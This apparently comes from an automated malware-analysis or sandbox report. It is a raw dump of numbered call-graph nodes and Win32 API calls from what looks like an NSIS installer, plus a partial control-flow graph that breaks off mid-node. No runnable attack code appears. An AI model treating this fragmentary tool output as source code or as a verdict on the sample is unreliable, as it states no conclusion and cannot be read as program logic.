GetProcAddress GlobalFree 5062->5153 5063->5075 5149 743312cc 5063->5149 5065->5069 5066 74332318 5068 74332325 lstrlenW 5066->5068 5066->5075 5067 74332126 5152 743312bb GlobalAlloc 5067->5152 5154 743316bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5068->5154 5069->5054 5069->5056 5069->5059 5069->5060 5069->5065 5069->5067 5073 74332067 GlobalFree 5069->5073 5074 743321ae 5069->5074 5069->5075 5078 743312cc 2 API calls 5069->5078 5079 74331dcd 5069->5079 5073->5069 5074->5075 5081 74332216 lstrcpyW 5074->5081 5075->5010 5076 743322d8 5076->5066 5083 74332302 GetProcAddress 5076->5083 5077 7433233f 5077->5075 5078->5069 5079->5069 5147 7433162f GlobalSize GlobalAlloc 5079->5147 5081->5075 5082 7433212f 5082->5010 5083->5066 5092 74332498 5084->5092 5086 743325c1 GlobalFree 5087 7433186f 5086->5087 5086->5092 5087->5018 5087->5022 5087->5026 5088 74332540 GlobalAlloc WideCharToMultiByte 5088->5086 5089 7433256b GlobalAlloc 5091 74332582 5089->5091 5090 743312cc GlobalAlloc lstrcpynW 5090->5092 5091->5086 5160 743327a4 5091->5160 5092->5086 5092->5088 5092->5089 5092->5090 5092->5091 5156 7433135a 5092->5156 5097 74332baa 5094->5097 5095 74332c4f VirtualAllocEx 5096 74332c6d 5095->5096 5163 74332b42 5096->5163 5097->5095 5099 74332d39 5099->5018 5101 74332453 5100->5101 5102 7433245e GlobalAlloc 5101->5102 5103 74331868 5101->5103 5102->5101 5103->5013 5108 74332840 5104->5108 5105 743328db GlobalAlloc 5109 743328fe 5105->5109 5106 743328ee 5107 743328f4 GlobalSize 5106->5107 5106->5109 5107->5109 5108->5105 5108->5106 5109->5038 5112 74332e2e 5110->5112 5111 74332e6e GlobalFree 5112->5111 5167 743312bb GlobalAlloc 5113->5167 5115 7433270b lstrcpynW 5121 7433265f 5115->5121 5116 743326fa StringFromGUID2 5116->5121 5117 743326d8 MultiByteToWideChar 5117->5121 5118 74332742 GlobalFree 5118->5121 5119 7433271e wsprintfW 5119->5121 5120 74332777 GlobalFree 5120->5027 5121->5115 5121->5116 5121->5117 5121->5118 5121->5119 5121->5120 5122 74331312 2 API calls 5121->5122 5168 74331381 5121->5168 5122->5121 5172 743312bb GlobalAlloc 5124->5172 5126 74331659 5127 74331666 2 API calls 5126->5127 5128 74331663 5127->5128 5129 74331312 5128->5129 5130 74331355 GlobalFree 5129->5130 5131 7433131b GlobalAlloc lstrcpynW 5129->5131 5130->5036 5131->5130 5133 74331672 wsprintfW 5132->5133 5134 7433169f lstrcpyW 5132->5134 5137 743316b8 5133->5137 5134->5137 5137->5039 5139 74332626 5138->5139 5140 74331931 5138->5140 5139->5140 5141 74332642 GlobalFree 5139->5141 5140->5046 5140->5047 5141->5139 5143 74331312 2 API calls 5142->5143 5144 743315fe 5143->5144 5144->5040 5145->5052 5146->5069 5148 7433164d 5147->5148 5148->5079 5155 743312bb GlobalAlloc 5149->5155 5151 743312db lstrcpynW 5151->5075 5152->5082 5153->5076 5154->5077 5155->5151 5157 74331361 5156->5157 5158 743312cc 2 API calls 5157->5158 5159 7433137f 5158->5159 5159->5092 5161 743327b2 VirtualAlloc 5160->5161 5162 74332808 5160->5162 5161->5162 5162->5091 5164 74332b4d 5163->5164 5165 74332b52 GetLastError 5164->5165 5166 74332b5d 5164->5166 5165->5166 5166->5099 5167->5121 5169 7433138a 5168->5169 5170 743313ac 5168->5170 5169->5170 5171 74331390 lstrcpyW 5169->5171 5170->5121 5171->5170 5172->5126 5558 7433170d 5559 743315b6 GlobalFree 5558->5559 5561 74331725 5559->5561 5560 7433176b GlobalFree 5561->5560 5562 74331740 5561->5562 5563 74331757 VirtualFree 5561->5563 5562->5560 5563->5560 5564 402b7e 5565 402bd0 5564->5565 5566 402b85 5564->5566 5567 406a96 5 API calls 5565->5567 5568 402da9 21 API calls 5566->5568 5571 402bce 5566->5571 5569 402bd7 5567->5569 5570 402b93 5568->5570 5572 402dcb 21 API calls 5569->5572 5573 402da9 21 API calls 5570->5573 5574 402be0 5572->5574 5577 402b9f 5573->5577 5574->5571 5575 402be4 IIDFromString 5574->5575 5575->5571 5576 402bf3 5575->5576 5576->5571 5582 4066a2 lstrcpynW 5576->5582 5581 4065e9 wsprintfW 5577->5581 5579 402c10 CoTaskMemFree 5579->5571 5581->5571 5582->5579 5583 401000 5584 401037 BeginPaint GetClientRect 5583->5584 5585 40100c DefWindowProcW 5583->5585 5587 4010f3 5584->5587 5590 401179 5585->5590 5588 401073 CreateBrushIndirect FillRect DeleteObject 5587->5588 5589 4010fc 5587->5589 5588->5587 5591 401102 CreateFontIndirectW 5589->5591 5592 401167 EndPaint 5589->5592 5591->5592 5593 401112 6 API calls 5591->5593 5592->5590 5593->5592 5594 402a80 5595 402da9 21 API calls 5594->5595 5596 402a86 5595->5596 5597 402ac9 5596->5597 5598 402aad 5596->5598 5605 402953 5596->5605 5599 402ae3 5597->5599 5600 402ad3 5597->5600 5601 402ab2 5598->5601 5602 402ac3 5598->5602 5604 4066df 21 API calls 5599->5604 5603 402da9 21 API calls 5600->5603 5608 4066a2 lstrcpynW 5601->5608 5609 4065e9 wsprintfW 5602->5609 5603->5605 5604->5605 5608->5605 5609->5605 4314 401781 4320 402dcb 4314->4320 4318 40178f 4319 4061c1 2 API calls 4318->4319 4319->4318 4321 402dd7 4320->4321 4322 4066df 21 API calls 4321->4322 4324 402df8 4322->4324 4323 401788 4326 4061c1 4323->4326 4324->4323 4325 406950 5 API calls 4324->4325 4325->4323 4327 4061ce GetTickCount GetTempFileNameW 4326->4327 4328 406208 4327->4328 4329 406204 4327->4329 4328->4318 4329->4327 4329->4328 5610 401d82 5611 402da9 21 API calls 5610->5611 5612 401d93 SetWindowLongW 5611->5612 5613 402c4f 5612->5613 5614 401503 5615 401508 5614->5615 5617 40152e 5614->5617 5616 402da9 21 API calls 5615->5616 5616->5617 5618 402903 5619 40290b 5618->5619 5620 40290f FindNextFileW 5619->5620 5622 402921 5619->5622 5621 402968 5620->5621 5620->5622 5624 4066a2 lstrcpynW 5621->5624 5624->5622 5625 74331774 5626 743317a3 5625->5626 5627 74331bff 22 API calls 5626->5627 5628 743317aa 5627->5628 5629 743317b1 5628->5629 5630 743317bd 5628->5630 5631 74331312 2 API calls 5629->5631 5632 743317c7 5630->5632 5633 743317e4 5630->5633 5640 743317bb 5631->5640 5634 743315dd 3 API calls 5632->5634 5635 743317ea 5633->5635 5636 7433180e 5633->5636 5637 743317cc 5634->5637 5638 74331654 3 API calls 5635->5638 5639 743315dd 3 API calls 5636->5639 5641 74331654 3 API calls 5637->5641 5642 743317ef 5638->5642 5639->5640 5643 743317d2 5641->5643 5644 74331312 2 API calls 5642->5644 5645 74331312 2 API calls 5643->5645 5646 743317f5 GlobalFree 5644->5646 5647 743317d8 GlobalFree 5645->5647 5646->5640 5648 74331809 GlobalFree 5646->5648 5647->5640 5648->5640 5649 401588 5650 402bc9 5649->5650 5653 4065e9 wsprintfW 5650->5653 5652 402bce 5653->5652 4829 401389 4831 401390 4829->4831 4830 4013fe 4831->4830 4832 4013cb MulDiv SendMessageW 4831->4832 4832->4831 5654 74331979 5655 7433199c 5654->5655 5656 743319d1 GlobalFree 5655->5656 5657 743319e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5655->5657 5656->5657 5658 74331312 2 API calls 5657->5658 5659 74331b6e GlobalFree GlobalFree 5658->5659 4833 74332a7f 4834 74332acf 4833->4834 4835 74332a8f VirtualProtect 4833->4835 4835->4834 5667 40198d 5668 402da9 21 API calls 5667->5668 5669 401994 5668->5669 5670 402da9 21 API calls 5669->5670 5671 4019a1 5670->5671 5672 402dcb 21 API calls 5671->5672 5673 4019b8 lstrlenW 5672->5673 5674 4019c9 5673->5674 5675 401a0a 5674->5675 5679 4066a2 lstrcpynW 5674->5679 5677 4019fa 5677->5675 5678 4019ff lstrlenW 5677->5678 5678->5675 5679->5677 5680 40508e GetDlgItem GetDlgItem 5681 4050e0 7 API calls 5680->5681 5690 405305 5680->5690 5682 405187 DeleteObject 5681->5682 5683 40517a SendMessageW 5681->5683 5684 405190 5682->5684 5683->5682 5685 4051c7 5684->5685 5689 4066df 21 API calls 5684->5689 5687 404621 22 API calls 5685->5687 5686 4053e7 5688 405493 5686->5688 5693 4052f8 5686->5693 5699 405440 SendMessageW 5686->5699 5692 4051db 5687->5692 5694 4054a5 5688->5694 5695 40549d SendMessageW 5688->5695 5691 4051a9 SendMessageW SendMessageW 5689->5691 5690->5686 5714 405374 5690->5714 5734 404fdc SendMessageW 5690->5734 5691->5684 5698 404621 22 API calls 5692->5698 5696 404688 8 API calls 5693->5696 5702 4054b7 ImageList_Destroy 5694->5702 5703 4054be 5694->5703 5710 4054ce 5694->5710 5695->5694 5701 405694 5696->5701 5715 4051ec 5698->5715 5699->5693 5705 405455 SendMessageW 5699->5705 5700 4053d9 SendMessageW 5700->5686 5702->5703 5706 4054c7 GlobalFree 5703->5706 5703->5710 5704 405648 5704->5693 5711 40565a ShowWindow GetDlgItem ShowWindow 5704->5711 5708 405468 5705->5708 5706->5710 5707 4052c7 GetWindowLongW SetWindowLongW 5709 4052e0 5707->5709 5719 405479 SendMessageW 5708->5719 5712 4052e5 ShowWindow 5709->5712 5713 4052fd 5709->5713 5710->5704 5729 405509 5710->5729 5739 40505c 5710->5739 5711->5693 5732 404656 SendMessageW 5712->5732 5733 404656 SendMessageW 5713->5733 5714->5686 5714->5700 5715->5707 5718 40523f SendMessageW 5715->5718 5720 4052c2 5715->5720 5721 405291 SendMessageW 5715->5721 5722 40527d SendMessageW 5715->5722 5718->5715 5719->5688 5720->5707 5720->5709 5721->5715 5722->5715 5724 405613 5726 40562a 5724->5726 5727 40561e InvalidateRect 5724->5727 5725 40554d 5725->5724 5730 4055c1 SendMessageW SendMessageW 5725->5730 5726->5704 5748 404f97 5726->5748 5727->5726 5728 405537 SendMessageW 5728->5725 5729->5725 5729->5728 5730->5725 5732->5693 5733->5690 5735 40503b SendMessageW 5734->5735 5736 404fff GetMessagePos ScreenToClient SendMessageW 5734->5736 5737 405033 5735->5737 5736->5737 5738 405038 5736->5738 5737->5714 5738->5735 5751 4066a2 lstrcpynW 5739->5751 5741 40506f 5752 4065e9 wsprintfW 5741->5752 5743 405079 5744 40140b 2 API calls 5743->5744 5745 405082 5744->5745 5753 4066a2 lstrcpynW 5745->5753 5747 405089 5747->5729 5754 404ece 5748->5754 5750 404fac 5750->5704 5751->5741 5752->5743 5753->5747 5755 404ee7 5754->5755 5756 4066df 21 API calls 5755->5756 5757 404f4b 5756->5757 5758 4066df 21 API calls 5757->5758 5759 404f56 5758->5759 5760 4066df 21 API calls 5759->5760 5761 404f6c lstrlenW wsprintfW SetDlgItemTextW 5760->5761 5761->5750 5762 40168f 5763 402dcb 21 API calls 5762->5763 5764 401695 5763->5764 5765 4069ff 2 API calls 5764->5765 5766 40169b 5765->5766 5767 402b10 5768 402da9 21 API calls 5767->5768 5769 402b16 5768->5769 5770 402953 5769->5770 5771 4066df 21 API calls 5769->5771 5771->5770 4889 402711 4890 402da9 21 API calls 4889->4890 4899 402720 4890->4899 4891 40285d 4892 40276a ReadFile 4892->4891 4892->4899 4893 402803 4893->4891 4893->4899 4903 406273 SetFilePointer 4893->4903 4894 406215 ReadFile 4894->4899 4896 4027aa MultiByteToWideChar 4896->4899 4897 40285f 4912 4065e9 wsprintfW 4897->4912 4899->4891 4899->4892 4899->4893 4899->4894 4899->4896 4899->4897 4900 4027d0 SetFilePointer MultiByteToWideChar 4899->4900 4901 402870 4899->4901 4900->4899 4901->4891 4902 402891 SetFilePointer 4901->4902 4902->4891 4904 40628f 4903->4904 4911 4062a7 4903->4911 4905 406215 ReadFile 4904->4905 4906 40629b 4905->4906 4907 4062b0 SetFilePointer 4906->4907 4908 4062d8 SetFilePointer 4906->4908 4906->4911 4907->4908 4909 4062bb 4907->4909 4908->4911 4910 406244 WriteFile 4909->4910 4910->4911 4911->4893 4912->4891 5772 401491 5773 405727 28 API calls 5772->5773 5774 401498 5773->5774 5775 404791 lstrlenW 5776 4047b0 5775->5776 5777 4047b2 WideCharToMultiByte 5775->5777 5776->5777 5778 404b12 5779 404b3e 5778->5779 5780 404b4f 5778->5780 5839 405ce6 GetDlgItemTextW 5779->5839 5782 404b5b GetDlgItem 5780->5782 5788 404bba 5780->5788 5785 404b6f 5782->5785 5783 404c9e 5837 404e4d 5783->5837 5841 405ce6 GetDlgItemTextW 5783->5841 5784 404b49 5786 406950 5 API calls 5784->5786 5787 404b83 SetWindowTextW 5785->5787 5790 40601c 4 API calls 5785->5790 5786->5780 5791 404621 22 API calls 5787->5791 5788->5783 5792 4066df 21 API calls 5788->5792 5788->5837 5796 404b79 5790->5796 5797 404b9f 5791->5797 5798 404c2e SHBrowseForFolderW 5792->5798 5793 404cce 5799 406079 18 API calls 5793->5799 5794 404688 8 API calls 5795 404e61 5794->5795 5796->5787 5803 405f71 3 API calls 5796->5803 5800 404621 22 API calls 5797->5800 5798->5783 5801 404c46 CoTaskMemFree 5798->5801 5802 404cd4 5799->5802 5804 404bad 5800->5804 5805 405f71 3 API calls 5801->5805 5842 4066a2 lstrcpynW 5802->5842 5803->5787 5840 404656 SendMessageW 5804->5840 5807 404c53 5805->5807 5810 404c8a SetDlgItemTextW 5807->5810 5814 4066df 21 API calls 5807->5814 5809 404bb3 5812 406a96 5 API calls 5809->5812 5810->5783 5811 404ceb 5813 406a96 5 API calls 5811->5813 5812->5788 5825 404cf2 5813->5825 5815 404c72 lstrcmpiW 5814->5815 5815->5810 5818 404c83 lstrcatW 5815->5818 5816 404d33 5843 4066a2 lstrcpynW 5816->5843 5818->5810 5819 404d3a 5820 40601c 4 API calls 5819->5820 5821 404d40 GetDiskFreeSpaceW 5820->5821 5824 404d64 MulDiv 5821->5824 5826 404d8b 5821->5826 5823 405fbd 2 API calls 5823->5825 5824->5826 5825->5816 5825->5823 5825->5826 5827 404dfc 5826->5827 5829 404f97 24 API calls 5826->5829 5828 404e1f 5827->5828 5830 40140b 2 API calls 5827->5830 5844 404643 EnableWindow 5828->5844 5831 404de9 5829->5831 5830->5828 5833 404dfe SetDlgItemTextW 5831->5833 5834 404dee 5831->5834 5833->5827 5836 404ece 24 API calls 5834->5836 5835 404e3b 5835->5837 5838 404a6b SendMessageW 5835->5838 5836->5827 5837->5794 5838->5837 5839->5784 5840->5809 5841->5793 5842->5811 5843->5819 5844->5835 5845 743310e1 5849 74331111 5845->5849 5846 743312b0 GlobalFree 5847 743311d7 GlobalAlloc 5847->5849 5848 74331240 GlobalFree 5848->5849 5849->5846 5849->5847 5849->5848 5850 743312ab 5849->5850 5851 7433135a 2 API calls 5849->5851 5852 74331312 2 API calls 5849->5852 5853 7433129a GlobalFree 5849->5853 5854 7433116b GlobalAlloc 5849->5854 5855 74331381 lstrcpyW 5849->5855 5850->5846 5851->5849 5852->5849 5853->5849 5854->5849 5855->5849 4913 401794 4914 402dcb 21 API calls 4913->4914 4915 40179b 4914->4915 4916 4017c3 4915->4916 4917 4017bb 4915->4917 4954 4066a2 lstrcpynW 4916->4954 4953 4066a2 lstrcpynW 4917->4953 4920 4017c1 4924 406950 5 API calls 4920->4924 4921 4017ce 4922 405f71 3 API calls 4921->4922 4923 4017d4 lstrcatW 4922->4923 4923->4920 4927 4017e0 4924->4927 4925 4069ff 2 API calls 4925->4927 4926 40181c 4928 40616d 2 API calls 4926->4928 4927->4925 4927->4926 4930 4017f2 CompareFileTime 4927->4930 4931 4018b2 4927->4931 4933 401889 4927->4933 4936 4066a2 lstrcpynW 4927->4936 4940 4066df 21 API calls 4927->4940 4947 405d02 MessageBoxIndirectW 4927->4947 4952 406192 GetFileAttributesW CreateFileW 4927->4952 4928->4927 4930->4927 4932 405727 28 API calls 4931->4932 4934 4018bc 4932->4934 4935 405727 28 API calls 4933->4935 4950 40189e 4933->4950 4937 403396 48 API calls 4934->4937 4935->4950 4936->4927 4938 4018cf 4937->4938 4939 4018e3 SetFileTime 4938->4939 4941 4018f5 CloseHandle 4938->4941 4939->4941 4940->4927 4942 401906 4941->4942 4941->4950 4943 40190b 4942->4943 4944 40191e 4942->4944 4945 4066df 21 API calls 4943->4945 4946 4066df 21 API calls 4944->4946 4948 401913 lstrcatW 4945->4948 4949 401926 4946->4949 4947->4927 4948->4949 4949->4950 4951 405d02 MessageBoxIndirectW 4949->4951 4951->4950 4952->4927 4953->4920 4954->4921 5856 401a97 5857 402da9 21 API calls 5856->5857 5858 401aa0 5857->5858 5859 402da9 21 API calls 5858->5859 5860 401a45 5859->5860 5861 401598 5862 4015b1 5861->5862 5863 4015a8 ShowWindow 5861->5863 5864 4015bf ShowWindow 5862->5864 5865 402c4f 5862->5865 5863->5862 5864->5865 5866 402419 5867 402dcb 21 API calls 5866->5867 5868 402428 5867->5868 5869 402dcb 21 API calls 5868->5869 5870 402431 5869->5870 5871 402dcb 21 API calls 5870->5871 5872 40243b GetPrivateProfileStringW 5871->5872 5873 743323e9 5874 74332453 5873->5874 5875 7433245e GlobalAlloc 5874->5875 5876 7433247d 5874->5876 5875->5874 5877 40201b 5878 402dcb 21 API calls 5877->5878 5879 402022 5878->5879 5880 4069ff 2 API calls 5879->5880 5881 402028 5880->5881 5882 402039 5881->5882 5884 4065e9 wsprintfW 5881->5884 5884->5882 5885 40569b 5886 4056ab 5885->5886 5887 4056bf 5885->5887 5888 4056b1 5886->5888 5889 405708 5886->5889 5890 4056c7 IsWindowVisible 5887->5890 5896 4056de 5887->5896 5892 40466d SendMessageW 5888->5892 5891 40570d CallWindowProcW 5889->5891 5890->5889 5893 4056d4 5890->5893 5895 4056bb 5891->5895 5892->5895 5894 404fdc 5 API calls 5893->5894 5894->5896 5896->5891 5897 40505c 4 API calls 5896->5897 5897->5889 5898 401b9c 5899 402dcb 21 API calls 5898->5899 5900 401ba3 5899->5900 5901 402da9 21 API calls 5900->5901 5902 401bac wsprintfW 5901->5902 5903 402c4f 5902->5903 5904 40149e 5905 4023c2 5904->5905 5906 4014ac PostQuitMessage 5904->5906 5906->5905 5907 4016a0 5908 402dcb 21 API calls 5907->5908 5909 4016a7 5908->5909 5910 402dcb 21 API calls 5909->5910 5911 4016b0 5910->5911 5912 402dcb 21 API calls 5911->5912 5913 4016b9 MoveFileW 5912->5913 5914 4016c5 5913->5914 5915 4016cc 5913->5915 5916 401423 28 API calls 5914->5916 5917 4069ff 2 API calls 5915->5917 5919 40231b 5915->5919 5916->5919 5918 4016db 5917->5918 5918->5919 5920 406462 40 API calls 5918->5920 5920->5914 5921 404122 5922 40413a 5921->5922 5923 40429b 5921->5923 5922->5923 5924 404146 5922->5924 5925 4042ec 5923->5925 5926 4042ac GetDlgItem GetDlgItem 5923->5926 5928 404151 SetWindowPos 5924->5928 5929 404164 5924->5929 5927 404346 5925->5927 5938 401389 2 API calls 5925->5938 5930 404621 22 API calls 5926->5930 5932 40466d SendMessageW 5927->5932 5949 404296 5927->5949 5928->5929 5933 40416d ShowWindow 5929->5933 5934 4041af 5929->5934 5931 4042d6 SetClassLongW 5930->5931 5935 40140b 2 API calls 5931->5935 5960 404358 5932->5960 5939 404259 5933->5939 5940 40418d GetWindowLongW 5933->5940 5936 4041b7 DestroyWindow 5934->5936 5937 4041ce 5934->5937 5935->5925 5991 4045aa 5936->5991 5941 4041d3 SetWindowLongW 5937->5941 5942 4041e4 5937->5942 5943 40431e 5938->5943 5944 404688 8 API calls 5939->5944 5940->5939 5945 4041a6 ShowWindow 5940->5945 5941->5949 5942->5939 5947 4041f0 GetDlgItem 5942->5947 5943->5927 5948 404322 SendMessageW 5943->5948 5944->5949 5945->5934 5946 4045ac DestroyWindow EndDialog 5946->5991 5952 404201 SendMessageW IsWindowEnabled 5947->5952 5953 40421e 5947->5953 5948->5949 5950 40140b 2 API calls 5950->5960 5951 4045db ShowWindow 5951->5949 5952->5949 5952->5953 5955 40422b 5953->5955 5958 404272 SendMessageW 5953->5958 5959 40423e 5953->5959 5965 404223 5953->5965 5954 4066df 21 API calls 5954->5960 5955->5958 5955->5965 5956 4045fa SendMessageW 5956->5939 5957 404621 22 API calls 5957->5960 5958->5939 5961 404246 5959->5961 5962 40425b 5959->5962 5960->5946 5960->5949 5960->5950 5960->5954 5960->5957 5966 404621 22 API calls 5960->5966 5982 4044ec DestroyWindow 5960->5982 5964 40140b 2 API calls 5961->5964 5963 40140b 2 API calls 5962->5963 5963->5965 5964->5965 5965->5939 5965->5956 5967 4043d3 GetDlgItem 5966->5967 5968 4043f0 ShowWindow EnableWindow 5967->5968 5969 4043e8 5967->5969 5992 404643 EnableWindow 5968->5992 5969->5968 5971 40441a EnableWindow 5974 40442e 5971->5974 5972 404433 GetSystemMenu EnableMenuItem SendMessageW 5973 404463 SendMessageW 5972->5973 5972->5974 5973->5974 5974->5972 5976 404103 22 API calls 5974->5976 5993 404656 SendMessageW 5974->5993 5994 4066a2 lstrcpynW 5974->5994 5976->5974 5978 404492 lstrlenW 5979 4066df 21 API calls 5978->5979 5980 4044a8 SetWindowTextW 5979->5980 5981 401389 2 API calls 5980->5981 5981->5960 5983 404506 CreateDialogParamW 5982->5983 5982->5991 5984 404539 5983->5984 5983->5991 5985 404621 22 API calls 5984->5985 5986 404544 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5985->5986 5987 401389 2 API calls 5986->5987 5988 40458a 5987->5988 5988->5949 5989 404592 ShowWindow 5988->5989 5990 40466d SendMessageW 5989->5990 5990->5991 5991->5949 5991->5951 5992->5971 5993->5974 5994->5978 5995 401a24 5996 402dcb 21 API calls 5995->5996 5997 401a2b 5996->5997 5998 402dcb 21 API calls 5997->5998 5999 401a34 5998->5999 6000 401a3b lstrcmpiW 5999->6000 6001 401a4d lstrcmpW 5999->6001 6002 401a41 6000->6002 6001->6002 6003 402324 6004 402dcb 21 API calls 6003->6004 6005 40232a 6004->6005 6006 402dcb 21 API calls 6005->6006 6007 402333 6006->6007 6008 402dcb 21 API calls 6007->6008 6009 40233c 6008->6009 6010 4069ff 2 API calls 6009->6010 6011 402345 6010->6011 6012 402356 lstrlenW lstrlenW 6011->6012 6013 402349 6011->6013 6014 405727 28 API calls 6012->6014 6015 405727 28 API calls 6013->6015 6017 402351 6013->6017 6016 402394 SHFileOperationW 6014->6016 6015->6017 6016->6013 6016->6017 6025 401da6 6026 401db9 GetDlgItem 6025->6026 6027 401dac 6025->6027 6029 401db3 6026->6029 6028 402da9 21 API calls 6027->6028 6028->6029 6030 401dfa GetClientRect LoadImageW SendMessageW 6029->6030 6031 402dcb 21 API calls 6029->6031 6033 401e58 6030->6033 6035 401e64 6030->6035 6031->6030 6034 401e5d DeleteObject 6033->6034 6033->6035 6034->6035 6036 4023a8 6037 4023af 6036->6037 6040 4023c2 6036->6040 6038 4066df 21 API calls 6037->6038 6039 4023bc 6038->6039 6039->6040 6041 405d02 MessageBoxIndirectW 6039->6041 6041->6040 6042 402c2a SendMessageW 6043 402c44 InvalidateRect 6042->6043 6044 402c4f 6042->6044 6043->6044 6045 74331058 6047 74331074 6045->6047 6046 743310dd 6047->6046 6048 74331092 6047->6048 6049 743315b6 GlobalFree 6047->6049 6050 743315b6 GlobalFree 6048->6050 6049->6048 6051 743310a2 6050->6051 6052 743310b2 6051->6052 6053 743310a9 GlobalSize 6051->6053 6054 743310b6 GlobalAlloc 6052->6054 6055 743310c7 6052->6055 6053->6052 6056 743315dd 3 API calls 6054->6056 6057 743310d2 GlobalFree 6055->6057 6056->6055 6057->6046 4864 4024af 4865 402dcb 21 API calls 4864->4865 4866 4024c1 4865->4866 4867 402dcb 21 API calls 4866->4867 4868 4024cb 4867->4868 4881 402e5b 4868->4881 4871 402503 4872 40250f 4871->4872 4875 402da9 21 API calls 4871->4875 4876 40252e RegSetValueExW 4872->4876 4878 403396 48 API calls 4872->4878 4873 402c4f 4874 402dcb 21 API calls 4877 4024f9 lstrlenW 4874->4877 4875->4872 4879 402544 RegCloseKey 4876->4879 4877->4871 4878->4876 4879->4873 4882 402e76 4881->4882 4885 40653d 4882->4885 4886 40654c 4885->4886 4887 4024db 4886->4887 4888 406557 RegCreateKeyExW 4886->4888 4887->4871 4887->4873 4887->4874 4888->4887 6058 74332d43 6059 74332d5b 6058->6059 6060 7433162f 2 API calls 6059->6060 6061 74332d76 6060->6061 6062 402930 6063 402dcb 21 API calls 6062->6063 6064 402937 FindFirstFileW 6063->6064 6065 40295f 6064->6065 6069 40294a 6064->6069 6066 402968 6065->6066 6070 4065e9 wsprintfW 6065->6070 6071 4066a2 lstrcpynW 6066->6071 6070->6066 6071->6069 6072 401931 6073 401968 6072->6073 6074 402dcb 21 API calls 6073->6074 6075 40196d 6074->6075 6076 405dae 71 API calls 6075->6076 6077 401976 6076->6077 6078 403d32 6079 403d3d 6078->6079 6080 403d44 GlobalAlloc 6079->6080 6081 403d41 6079->6081 6080->6081 6089 401934 6090 402dcb 21 API calls 6089->6090 6091 40193b 6090->6091 6092 405d02 MessageBoxIndirectW 6091->6092 6093 401944 6092->6093 4955 4028b6 4956 4028bd 4955->4956 4958 402bce 4955->4958 4957 402da9 21 API calls 4956->4957 4959 4028c4 4957->4959 4960 4028d3 SetFilePointer 4959->4960 4960->4958 4961 4028e3 4960->4961 4963 4065e9 wsprintfW 4961->4963 4963->4958 6094 401f37 6095 402dcb 21 API calls 6094->6095 6096 401f3d 6095->6096 6097 402dcb 21 API calls 6096->6097 6098 401f46 6097->6098 6099 402dcb 21 API calls 6098->6099 6100 401f4f 6099->6100 6101 402dcb 21 API calls 6100->6101 6102 401f58 6101->6102 6103 401423 28 API calls 6102->6103 6104 401f5f 6103->6104 6111 405cc8 ShellExecuteExW 6104->6111 6106 401fa7 6107 402953 6106->6107 6108 406b41 5 API calls 6106->6108 6109 401fc4 CloseHandle 6108->6109 6109->6107 6111->6106 6112 4014b8 6113 4014be 6112->6113 6114 401389 2 API calls 6113->6114 6115 4014c6 6114->6115 6116 402fb8 6117 402fe3 6116->6117 6118 402fca SetTimer 6116->6118 6119 403031 6117->6119 6120 403037 MulDiv 6117->6120 6118->6117 6121 402ff1 wsprintfW SetWindowTextW SetDlgItemTextW 6120->6121 6121->6119 6123 401d3c 6124 402da9 21 API calls 6123->6124 6125 401d42 IsWindow 6124->6125 6126 401a45 6125->6126

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 403665-4036b7 SetErrorMode GetVersionExW 1 4036f1-4036f6 0->1 2 4036b9-4036e9 GetVersionExW 0->2 3 4036f8 1->3 4 4036fe-403740 1->4 2->1 3->4 5 403742-40374a call 406a96 4->5 6 403753 4->6 5->6 11 40374c 5->11 8 403758-40376c call 406a26 lstrlenA 6->8 13 40376e-40378a call 406a96 * 3 8->13 11->6 20 40379b-4037ff #17 OleInitialize SHGetFileInfoW call 4066a2 GetCommandLineW call 4066a2 13->20 21 40378c-403792 13->21 28 403801-403803 20->28 29 403808-40381c call 405f9e CharNextW 20->29 21->20 25 403794 21->25 25->20 28->29 32 403917-40391d 29->32 33 403821-403827 32->33 34 403923 32->34 35 403830-403837 33->35 36 403829-40382e 33->36 37 403937-403951 GetTempPathW call 403634 34->37 38 403839-40383e 35->38 39 40383f-403843 35->39 36->35 36->36 47 403953-403971 GetWindowsDirectoryW lstrcatW call 403634 37->47 48 4039a9-4039c3 DeleteFileW call 4030f5 37->48 38->39 41 403904-403913 call 405f9e 39->41 42 403849-40384f 39->42 41->32 56 403915-403916 41->56 45 403851-403858 42->45 46 403869-4038a2 42->46 51 40385a-40385d 45->51 52 40385f 45->52 53 4038a4-4038a9 46->53 54 4038bf-4038f9 46->54 47->48 66 403973-4039a3 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403634 47->66 62 403bb0-403bc0 call 403c82 OleUninitialize 48->62 63 4039c9-4039cf 48->63 51->46 51->52 52->46 53->54 58 4038ab-4038b3 53->58 60 403901-403903 54->60 61 4038fb-4038ff 54->61 56->32 64 4038b5-4038b8 58->64 65 4038ba 58->65 60->41 61->60 67 403925-403932 call 4066a2 61->67 77 403bc2-403bd2 call 405d02 ExitProcess 62->77 78 403be6-403bec 62->78 69 4039d5-4039e0 call 405f9e 63->69 70 403a68-403a6f call 403d74 63->70 64->54 64->65 65->54 66->48 66->62 67->37 82 4039e2-403a17 69->82 83 403a2e-403a38 69->83 80 403a74-403a78 70->80 84 403c6a-403c72 78->84 85 403bee-403c04 GetCurrentProcess OpenProcessToken 78->85 80->62 89 403a19-403a1d 82->89 92 403a3a-403a48 call 406079 83->92 93 403a7d-403aa3 call 405c6d lstrlenW call 4066a2 83->93 86 403c74 84->86 87 403c78-403c7c ExitProcess 84->87 90 403c06-403c34 LookupPrivilegeValueW AdjustTokenPrivileges 85->90 91 403c3a-403c48 call 406a96 85->91 86->87 94 403a26-403a2a 89->94 95 403a1f-403a24 89->95 90->91 105 403c56-403c61 ExitWindowsEx 91->105 106 403c4a-403c54 91->106 92->62 103 403a4e-403a64 call 4066a2 * 2 92->103 113 403ab4-403acc 93->113 114 403aa5-403aaf call 4066a2 93->114 94->89 100 403a2c 94->100 95->94 95->100 100->83 103->70 105->84 108 403c63-403c65 call 40140b 105->108 106->105 106->108 108->84 115 403ad1-403ad5 113->115 114->113 118 403ada-403b04 wsprintfW call 4066df 115->118 122 403b06-403b0b call 405bf6 118->122 123 403b0d call 405c50 118->123 127 403b12-403b14 122->127 123->127 128 403b50-403b6f SetCurrentDirectoryW call 406462 CopyFileW 127->128 129 403b16-403b20 GetFileAttributesW 127->129 136 403b71-403b92 call 406462 call 4066df call 405c85 128->136 137 403bae 128->137 131 403b41-403b4c 129->131 132 